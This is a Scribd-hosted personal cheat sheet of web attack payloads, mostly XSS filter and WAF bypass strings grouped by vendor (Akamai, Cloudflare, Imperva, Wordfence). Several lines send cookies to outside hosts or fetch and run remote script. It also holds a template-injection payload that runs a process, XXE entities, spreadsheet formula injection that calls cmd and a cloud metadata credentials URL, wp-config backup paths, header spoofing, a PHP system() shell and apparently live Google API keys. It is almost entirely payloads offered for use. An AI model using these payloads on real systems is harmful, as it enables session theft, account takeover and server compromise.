Scribd
Upload
20 views

XSS_Notes

Uploaded by

marvelironman3000
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
20 views

XSS_Notes

Uploaded by

marvelironman3000
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 23

EICARdropper

https://thecyberpunker.com/blog/xss-payloads/

https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/

.*\.doit\.com$

https://translation.googleapis.com/language/translate/v2?key=AIzaSyBdJ88HN7LTGk1
2X5whfaVv8a5ozTEMP_k&target=language

https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=AIzaSyC5Lai
ovNX0mzDrDlOoLEKWCH2EWOSQohg

--------------------------------------------------------------------------------------------------------------
----------------------------

Most IMP XSS Payloads for Waf Bypass

--------------------------------------------------------------------------------------------------------------
----------------------------

Test<a href=javascript:alert(1)>click<a %00


src=\"&Tab;javascript:prompt(document.cookie)&Tab;\"%00onclick=alert(1)> fooo

ASP.NET payloads, by @shrekysec

/(A('onerror=%22alert%601%60%22testabcd))/

/Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders

(A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f

"></SCRIPT>--
!><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%27}};">});});})]--

Bypass Filter JavaScript source code

--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(100, 111, 99, 117, 109, 101, 110,


116, 46, 99, 111, 111, 107, 105, 101))</SCRIPT>
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--
></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoF
ocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--
></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoF
ocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

<button onClick={() => router.push("javascript:(alert)(3)")}>Click</button>

i2lte%22%3e%3cscript%3ealert(1)%3c%2fscript%3eayawz

<A/HRef=javascript:top/**/?.['ale'%2B'rt'](1)>

<</div>script</div>>confirm()<</div>/script</div>>

<svg/onload=window["al"+"ert"]`1337`>

<img src="image.png" usermap="#themap" width="99" height="99"><map


name="themap"><area coords="0,0,99,99" href="javascript:alert(1337)"></map>

<iframe src="javascript:setTimeout(function() {
/*\*/top['al'+'\u0065'+'rt'](document.domain)/*\*/ }, 5000);"></inpuT%3E;>

<inpuT autofocus oNFocus="setTimeout(function() {


/*\*/top['al'+'\u0065'+'rt'](document.domain)/*\*/ }, 5000);"></inpuT%3E;>

1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>


<!--
><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.coo
kie)%27>

<div
onpointerover="ja&#x76;ascr&#x69;pt:eva&#x6C;(decodeURICompo&#110;ent(String.f
romCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100,
111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26
%2300000000000000000041//

<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return
this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">

<video><source onerror="alert.constructor.constructor('return this')().alert('0f')">

<EMBED SRC="data:image/svg+xml;base64,PHN2Zy9vbmxvYWQ9d2luZG93WyJhbCIrI
mVydCJdYDEzMzdgPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBE
D>

<svg/onload=window[“al”+”ert”]`1337`>

<option><style></option></select><img src=x onerror=alert(1)></style>

<Svg Only=1 OnLoad=confirm(1)>

<input/onclick=alert(1)>

{{constructor.constructor('alert(document.cookie)')()}}
<image src/onerror=alert("Contact_Name")>

javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click


me</button><hvita onbeforetoggle=+a+b+c+ popover id=x>Hvita</hvita>")

<a href=\"javascript:alert(document.domain)\" onClick=\"var a =\"}, var a=5;


prompt(7);function a(){var b={c: {d:{//\"\">Click Me</a>

<A href=javascript:alert(1)>asd

<script>alert()<\/script>

"/><img src=u onerror="alert(document.domain)"<

<details ontoggle=alert(1)>

<a href="data:text/html,<script>alert(1)</script>">Click Here</a>

<a target="_blank" href="mailto:bar"onclick="alert(1)"<script>alert(1)</script>


onhower=alert(2)>Safe</a>

<p><a href="mailto:<svg/onload="alert(1)"//@x"><svg/onload="alert(1)"//@x</a></p>

<a target="_blank"
href="data:text/URI,javascript:alert(window.opener.document.cookie);">test</a>

<svg/onload=alert(/1/)>
<svg/on<script>load=prompt(document.domain);>”/>

<script>x=new
XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’
file:///etc/hosts’);x.send();</script>

<noscript>&amp;lt;p title=” &lt;/noscript&gt;&lt;style onload=


alert(document.domain)//&quot;&gt; *{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;}
&lt;/style&gt;

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;onclick=alert(1)">Click
me</a>

<script>history.pushState(0,0,’/i/am/somewhere_else’);</script><iframe
onload=”javascript:alert(document.domain)”>

<body onload="javascript:location.replace('\x2fportal\x2fc');">

--------------------------------------------------------------------------------------------------------------
----------------------------

AKamai Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<style>@keyframes
a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>

<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>

<svg><circle><set onbegin=prompt(1) attributename=fill>

<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`

<x onauxclick=import('//1152848220/')>click

<x onauxclick=a=alert,a(domain)>click

<x onauxclick=import('//1152848220/')>click

<x onauxclick=import('//xss/')>click

\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss

{{constructor.constructor(alert`1`)()}}

javascript:new%20Function`al\ert\`1\``;

https://twitter.com/xhzeem/status/1378316651431612422

https://twitter.com/xhzeem/status/1377992310974218245

<script>Object.prototype.BOOMR = 1;Object.prototype.url='https://portswigger-
labs.net/xss/xss.js'</script> -https://portswigger.net/web-security/cross-site-
scripting/cheat-sheet

"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hacke
rone.com/stealthy?x="+location)'>Click

--------------------------------------------------------------------------------------------------------------
----------------------------

Cloudflare Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<a"/onclick=(confirm)()>Click Here!

Dec: <svg onload=prompt%26%230000000040document.domain)>

Hex: <svg onload=prompt%26%23x000000028;document.domain)>

xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<a
href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Ta
b;t&Tab;(document.domain)&rpar;">X</a>

<--%253cimg%20onerror=alert(1)%20src=a%253e --!>

<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>

javascript:{ alert`0` }

1'"><img/src/onerror=.1|alert``>

<img src=x onError=import('//1152848220/')>

%2sscript%2ualert()%2s/script%2u

<svg on onload=(alert)(document.domain)>

<img ignored=() src=x onerror=prompt(1)>

<svg onx=() onload=(confirm)(1)>

“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;docume
nt.cookie%26%2300000000000000000041;

<svg on =i onload=alert(domain)

<svg/onload=location/**/='https://your.server/'+document.domain>

<svg onx=() onload=window.alert?.()>

test",prompt%0A/*HelloWorld*/(document.domain)

"onx+%00+onpointerenter%3dalert(domain)+x"

"><svg%20onload=alert%26%230000000040"1")>

%27%09);%0d%0a%09%09[1].find(alert)//

"><img src=1 onmouseleave=print()>

<svg on onload=(alert)(document.domain)>

<svg/on%20onload=alert(1)> (working)

<img/src=x onError="`${x}`;alert(`Ex.Mi`);">
--------------------------------------------------------------------------------------------------------------
----------------------------

Cloudfront Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x


onerror=javascript:alert(`cloudfrontbypass`)//'>

">'><details/open/ontoggle=confirm('XSS')>

6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/

&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;

--------------------------------------------------------------------------------------------------------------
----------------------------

Imperva Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme

tarun"><x/onafterscriptexecute=confirm%26lpar;)//

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+
v+h+n)(/infected/.source)" />click

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%
2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

<svg onload\r\n=$.globalEval("al"+"ert()");>

<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click

<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v
+h+n)(/infected/.source)" />tap

--------------------------------------------------------------------------------------------------------------
----------------------------

Incapsula Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>

<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b;


this['src']=a">

<audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]'


src=x>

<img/src=q onerror='new Function`al\ert\`1\``'>

<object
data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></obje
ct>

<svg onload\r\n=$.globalEval("al"+"ert()");>

[1].map(alert) or (alert)(1)

<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-
tarun/&rpar;">XXXXX</a>

[1].find(confirm)

<svg/onload=self[`aler`%2b`t`]`1`>

%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwv
c2NyaXB0Pg==%3E%3C/object%3E

'-[document.domain].map(alert)-'
--------------------------------------------------------------------------------------------------------------
----------------------------

Wordfence Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%25
2fscript%253ey6uu6

<meter onmouseover="alert(1)" -@manjith27945363

'">><div><meter onmouseover="alert(1)"</div>"

>><marquee loop=1 width=0 onfinish=alert(1)>

Wordfence 7.4.2

<a href=&#01javascript:alert(1)>

<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;
%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20cl
ick%20here</a>

--------------------------------------------------------------------------------------------------------------
----------------------------

For Slack

--------------------------------------------------------------------------------------------------------------
----------------------------

'"<b oncut=alert(3)>asd</b>>

slack '"><sript>var a= 4;</script> test '"><script>var a =1; </script>

'"><img src=u onerror=alert(21)>

<script>alert(1)</script>

'"><b>ssss<a href="google.com">ssss</a><img/src='u'/onerror=alert(7777)>
'"><b>ss<a href="google.com">ssss</a><img/src='u'/onerror=alert()>

"'><img src=u onerror=alert(1)>

<a href="https://www.google.com">Q1</a>

[click here](https://www.google.com"+onclick=alert(1)

--------------------------------------------------------------------------------------------------------------
----------------------------

Random Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

test1 <a href="data:text/html,<script>alert(1)</script>">Click Here</a>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(
String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"

<script/src=data:,alert()>

<marquee/onstart=alert()>

<video/poster/onerror=alert()>

<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<a onmouseover="alert(document.cookie)">xxs link</a>

<a onmouseover=alert(document.cookie)>xxs link</a>


<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=# onmouseover="alert('xxs')">

<IMG SRC= onmouseover="alert('xxs')">

<IMG onmouseover="alert('xxs')">

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

<IMG
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&
#108;&#101;&#114;&#116;&#40;

&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&
#0000105&#0000112&#0000116&#0000058&#0000097&

#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000
083&#0000083&#0000039&#0000041>

<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6
C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

<IMG SRC=" &#14; javascript:alert('XSS');">

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

<SCRIPT SRC=//ha.ckers.org/.j>

<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <

\";alert('XSS');//

</script><script>alert('XSS');</script>

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

<IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="livescript:[code]">

<BODY ONLOAD=alert('XSS')>

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

exp/*<A STYLE='no\xss:noxss("*//*");

xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">

¼script¾alert(¢XSS¢)¼/script¾

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html


base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-
image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\007
4\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->

<BASE HREF="javascript:alert('XSS');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT


SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>

<IMG
SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciou
scode">

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">


</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>


<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<A HREF="http://66.102.7.147/">XSS</A>

0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"

veris-->group<svg/onload=alert(/XSS/)//

#"><img src=M onerror=alert('XSS');>

element[attribute='<img src=x onerror=alert('XSS');>

[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]

%22;alert%28%27RVRSH3LL_XSS%29//

javascript:alert%281%29;

<w contenteditable id=x onfocus=alert()>

alert;pg("XSS")

<svg/onload=%26%23097lert%26lpar;1337)>

<script>for((i)in(self))eval(i)(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

<sCR<script>iPt>alert(1)</SCr</script>IPt>

<a
href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
test</a>

Vue JS
{{$emit.constructor`fetch(%27https://8v4y3qmogobk2g6bewqtqa83quwkk9.oastify.co
m%27,%20{%20method:%20%27POST%27,%20mode:%20%27no-
cors%27,%20body:%20document.cookie%20});`()}}

{{$emit.constructor`function b(){eval(this.responseText)};a=new
XMLHttpRequest();a.addEventListener("load", b);a.open("GET",
"//xss.report/s/sid0krypt");a.send()`()}}

{{_Vue.h.constructor('x','console.log("HI this is sid0krypt")')(this)}}

{{_Vue.h.constructor('x','console.log(x)')(this)}}

{{_Vue.h.constructor`alert(1)`()}}

{{$emit.constructor`alert(1)`()}}

${\"zjz\".toString().replace(\"j\", \"o\")}

${'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineB
yName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder;
x.command(\\\"ping\\\",\\\"szvta3myzyhu8udxodgghh6hm8sygn.burpcollaborator.net\\\
"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}

XML External Entity (XXE) Injection

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM

"https://zqtb5eufvtnznrn5l4il14ajeak28swh.oastify.com" > ]><test>&xxe</test><svg


xmlns="http://www.w3.org/2000/svg"><text font-size="16" x="10"

y="40">%26xxe1;</text></svg>, <?xml version="1.0" standalone="yes"?><!DOCTYPE


test [ <!ENTITY
xxe1 SYSTEM "http://geysgbf5kz1xoad21xx9yqo11s7iv7.burpcollaborator.net" > ]><svg

xmlns="http://www.w3.org/2000/svg"><text font-size="16" x="10"


y="40">%26xxe1;</text></svg>

*********HTML Injection*********

<a href=https://www.google.com>Link</a>

<a href=https://www.google.com>SLACK</a>

<a href=https://www.google.com>Click here</a>

*********Formula Injection*********

=calc|A0!Z

@calc|A0!Z

=cmd|' /C calc'!xxx

=cmd|'/Ccalc.exe'!z

=cmd|' /C notepad'!'A1'

DDE ("cmd";"/C calc";"!A0")A0

%0A-3+3+cmd|' /C calc'!D2

*********Command Execution*********

=WEBSERVICE("http://169.254.169.254/latest/meta-data/iam/security-credentials/"),

=WEBSERVICE("http://7498qogq07az5hxtjvy2ks36ixooce03.oastify.com"),

=INFO("/etc/passwd"),

=INFO("SYSTEM"),

=INFO("OSVERSION")

*********CSRF*********
http://gursevkalra.blogspot.com/2011/12/json-csrf-with-parameter-padding.html ----
JSON Padding

https://www.geekboy.ninja/blog/tag/json-csrf/ -------------------------------------JSON
Padding

JSON change into x-www-form-urlencoded

replace ":" with = and "," with &

ASP.NET Padding oracle

webresorece.axd url ma check karvu

web cache poissioning

coockie language:en

coockie language:pl 400 or 403

X-Forwared-Host:Blueinfy

pachi ni main request ma same j respons aave

try in GET Method

xmlrpc.php

<?xml version="1.0"?>

<methodCall>

<methodName>system.listMethods</methodName>

<params>

</params>

</methodCall>

https://kipwise.com/xmlrpc.php

<?xml version="1.0"?>
<methodCall>

<methodName>pingback.ping</methodName>

<params><params>

<value><string>http://</string></value>

</param><param><value><string>https://kipwish.com</string>

</value></param></params>

</methodCall>

curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL

--------------------------------------------------------------------------------------------------------------
----------------------------

Wordpress

--------------------------------------------------------------------------------------------------------------
----------------------------

/.htaccess

/wp-includes/

/wp-json/

/wp-content/uploads/

/wp-json/wp/v2/users

/wp-admin

/wp-admin/admin-ajax.php

/wp-json/?rest_route=/wp/v2/users/

/wp-config.php-backup /wp-config.php.orig

/.wp-config.php.swp

/wp-config-sample.php /wp-config.inc

/wp-config.old
/wp-config.txt

/wp-config.php.txt

/wp-config.php.bak

/wp-config.php.old

/wp-config.php.dist

/wp-config.php.inc

/wp-config.php.swp

/wp-config.php.html

/wp-config-backup.txt /wp-config.php.save

/wp-config.php~

/wp-config.php.original

/_wpeprivate/config.json

Wordpress Elementor Website Builder plugin <= 3.5.5 versions

#elementor-
action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidml
kZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZ
W50LmRvbWFpbikifX0=

https://www.cvedetails.com/ ------CVSS Score

{{5*5}}

{{7,*7}} ------Templet injection

https://autocode.com/guides/how-to-build-a-slack-bot/

x-forwarded-scheme: http

X-forwarded-host: host
X-Real-IP: 127.0.0.1

X-Client-IP: 120.0.0.1

X-Rewrite-URL: 127.0.0.1

X-Remote-IP: 127.0.0.1

X-Remote-Addr: 127.0.0.1

X-ProxyUser-Ip: 127.0.0.1

X-Originating-IP: 127.0.0.1

X-Original-URL: 127.0.0.1

X-Forwarded: 127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Custom-IP-Authorization: 127.0.0.1

True-Client-IP: 127.0.0.1

Intercom ChatBot Security Misconfiguration:

Intercom('boot', { email: '[email protected]' });

HelpCrunch ChatBot Security Misconfiguration

HelpCrunch('userAuth', {user_id: '[email protected]'});

Botframework (microsoft Azure)

WebChat.createDirectLine({userEmail:'[email protected]'});

https://calendar.google.com/calendar/b/1/r?cid=users_mail_address@company_name
.com

https://gitlab.com/dee-see/notkeyhacks
' waitfor delay'0:0:15'--

Error Base

union Base

Blind - Time and Boolean

Second order SQL Injection

Update user password='123' where username = 'xyz' and password = '123'

Update user password='123' where username ='xyz'-- and

Broken Access Control

Cryptographic Failuare

Injection

Insecure Designed

Security Misconfiguration

Vulnerable and outdated Componants

Authentication or identification Failure

Software Data and integrity Failuare

Security logging and Monitoring Failuare

SSFR

<?php system(id); ?>

Firebase:

https://blog.appsecco.com/exploiting-weak-configurations-in-google-identity-platform-
cbddbd0e71e3
https://hacktricks.boitatech.com.br/pentesting/pentesting-web/buckets/firebase-
database

__/firebase/init.json

GET /v1alpha/projects/-
/apps/1:361636954636:web:220eedf13a3a1aa0d36429/webConfig HTTP/2

Host: firebase.googleapis.com

X-Goog-Api-Key: AIzaSyB8KMna82QZS8RR9mIjO-xOzq19E4Vx-gg

If Find SSRF go for the https://www.youtube.com/watch?v=apzJiaQ6a3k

Hint: `whoami`.<burp>

You might also like